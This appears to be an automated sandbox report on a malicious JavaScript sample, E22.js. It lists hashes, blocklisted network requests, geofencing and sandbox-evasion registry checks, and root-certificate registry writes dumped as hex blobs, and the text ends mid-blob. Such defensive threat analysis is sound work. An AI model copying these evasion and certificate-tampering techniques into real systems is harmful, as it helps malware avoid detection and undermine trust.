1ee748916df4463f7869f61b0604e5773ba69833cb49ee7b792d7c69c327938e

Analysis

max time kernel
143s
max time network
270s
platform
windows10-2004_x64
resource
win10v2004-20231020-en
resource tags

arch:x64arch:x86image:win10v2004-20231020-enlocale:en-usos:windows10-2004-x64system
submitted
23/10/2023, 11:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

E22.js
Size

411KB
MD5

babe6c10e982d330159da694fb24bb9c
SHA1

af4ac715139eb6c02457cdecdb3763c3a491ff26
SHA256

911db6f7254a6583284b930ef7fea36462971da3f250085b6769b8bb65ef1af4
SHA512

cbfedcdbbe4906151189751a819c4e32e06cce98e5962a4e0c3851aa5981b48229650db5045795c5df64a0e1e70907ae43f4bef1e6c749db07bacb34b3ac14cf
SSDEEP

6144:Gj38P9IwPaHP79bvi5u9r9pMrSGyhZCod1fnbyC36dxEDukY4X1:MNXCgt6dxEfY4F

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
4	2184	wscript.exe
8	2184	wscript.exe
12	2184	wscript.exe

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000\Control Panel\International\Geo\Nation	wscript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 8 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1511405631-3522522280-778892991-1000_Classes\Local Settings	firefox.exe

Modifies system certificate store 2 TTPs 8 IoCs

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 0f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 190000000100000010000000787d09f953c59978ecd8d6e44b38e24f0f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 040000000100000010000000866912c070f1ecacacc2d5bca55ba129030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb1d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a140000000100000014000000dd040907a2f57a7d5253129295ee3880250da65962000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b6909000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410000000f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e72190000000100000010000000787d09f953c59978ecd8d6e44b38e24f2000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9	wscript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B7AB3308D1EA4477BA1480125A6FBDA936490CBB\Blob = 5c000000010000000400000000100000190000000100000010000000787d09f953c59978ecd8d6e44b38e24f0f0000000100000020000000489ff6233f3d3c5da77604be230745657fe488cb05257da551bfd64c1f179e720b0000000100000052000000530053004c002e0063006f006d00200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b0601050507030862000000010000002000000085666a562ee0be5ce925c1d8890a6f76a87ec16d4d7d5f29ea7419cf20123b69140000000100000014000000dd040907a2f57a7d5253129295ee3880250da6591d00000001000000100000000d48ee33d7f1af8f4b002527f82a344a030000000100000014000000b7ab3308d1ea4477ba1480125a6fbda936490cbb040000000100000010000000866912c070f1ecacacc2d5bca55ba1292000000001000000e1050000308205dd308203c5a00302010202087b2c9bd316803299300d06092a864886f70d01010b0500307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f7269747920525341301e170d3136303231323137333933395a170d3431303231323137333933395a307c310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3131302f06035504030c2853534c2e636f6d20526f6f742043657274696669636174696f6e20417574686f726974792052534130820222300d06092a864886f70d01010105000382020f003082020a0282020100f90fdda32b7dcbd02afeec6785a6e72e1bba77e1e3f5afa4ecfa4a5d91c457476b18776b76f2fd93e43d0fc2169e0b66c356949e178385ce56eff216fd0062f5220954e865174e41b9e04f4697aa1bc8b86e625e69b15fdb2a027efc6ccaf341d8edd0e8fc3f6148edb003141d100e4b19e0bb4eec8665ff36f35e67020b9d865561fd7a38edfee21900b76fa1506275743ca0fac82592b46e7a22c7f81ea1e3b2dd9131ab2b1d04ffa54a0437e985a4332bfde2d655347c19a44a68c7b2a8d3b7caa19388ebc197bc8cf91dd922842474c7043d6aa92993ccebb85be1fe5f25aa3458c8c123549d1b9811c3389c7e3d866ca50f40867c02f45c024f28cbae719f0f3ac833fe112535eafcbac5603dd97c18d5b2a9d37578037222ca3ac31fef2ce52ea9fa9e2cb65146fdaf03d6ea6068ea8516366b85e91ec0b3ddc424dc802a81416d943ec8e0c98141009e5ebf7fc50898a2182c4240b3f96f38274b4e80f43d8147e0887cea1cceb5755c512e1c2b7f1a7228e700b5d174c6d7e49fad0793b6533535fc37e4c3f65d16be2173de920af8a0636abc96926a3ef8bc65559bdef50d892604fc251aa62569cbc26dca7ce2595f97acebef2ec8bcd71b593c2bccf219c8936b276319cffce926f8ca719b7f93fe3467844e99ebfcb378093370ba66a676ed1b73eb1aa50dc422132094560a4e2c6c4eb1fdcf9c09baa233ed870203010001a3633061301d0603551d0e04160414dd040907a2f57a7d5253129295ee3880250da659300f0603551d130101ff040530030101ff301f0603551d23041830168014dd040907a2f57a7d5253129295ee3880250da659300e0603551d0f0101ff040403020186300d06092a864886f70d01010b050003820201002018119429fb269d1c1e1e7061f19572937124ad6893588e32af1bb37003fc252b7485903d786af4b98ba5973bb51891bb1ea7f9405b91f95599af1e11d05c1da766e3b194070c3239a6ea1bb079d81d9c7044e38addc4f9951f8a38433f0185a547a73d46b2bce52268f77b9cd82c3e0a21c82d33acbfc581993174c17571c5beb1f02345f49d6bfc19639da3bc04c6180b25bb53890fb38050de45ee447fab94786498d3f628dd87d8706574fb0eb913eba70f61a93296ccdebbed634c18bba940f7a0546e2088717518ea7ab43472e02327775cb690ea862540abef330fcb9f82bea220fbf6b52d1ae6c285b1740ffbc86502a4520147dd4922c1bfd8eb6bac7edeec633315b723088fc60f8d415add8ec5b98fe5453f78dbbad21b40b1fe714d3fe081a2ba5eb4ec15e093dd081f7ee155990b21de939e0afbe6a349bd3630fee777b2a07597b52d8188176520f7da90009fc952cc32ca357cf53d0fd82bd7f5266cc906349616ea70591a3279790bb6887f0f52483dbf6cd8a2442ed14eb77258d3891395fe44abf8d78b1b6e9cbc2ca05bd56a00af5f37e1d5fa100b989c86e7268fcef0ec6e8a570b80e34eb2c0a0636190ba556837746ab692db9fa18622b665270eecb69f4260e467c2b5da410bc4d38b611bbcfa1f912bd744075eba29acd9c5e9ef53485aeb80f1285821cdb00655fb273f539070a9041e5727b9	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 040000000100000010000000e11e31581aae545302f6176a117b4d950f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b5300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100200052003200000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a190000000100000010000000683f58e5528121a89cf21532e700535f2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 5c000000010000000400000000100000190000000100000010000000683f58e5528121a89cf21532e700535f030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e6200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c09000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410020005200320000005300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b040000000100000010000000e11e31581aae545302f6176a117b4d952000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9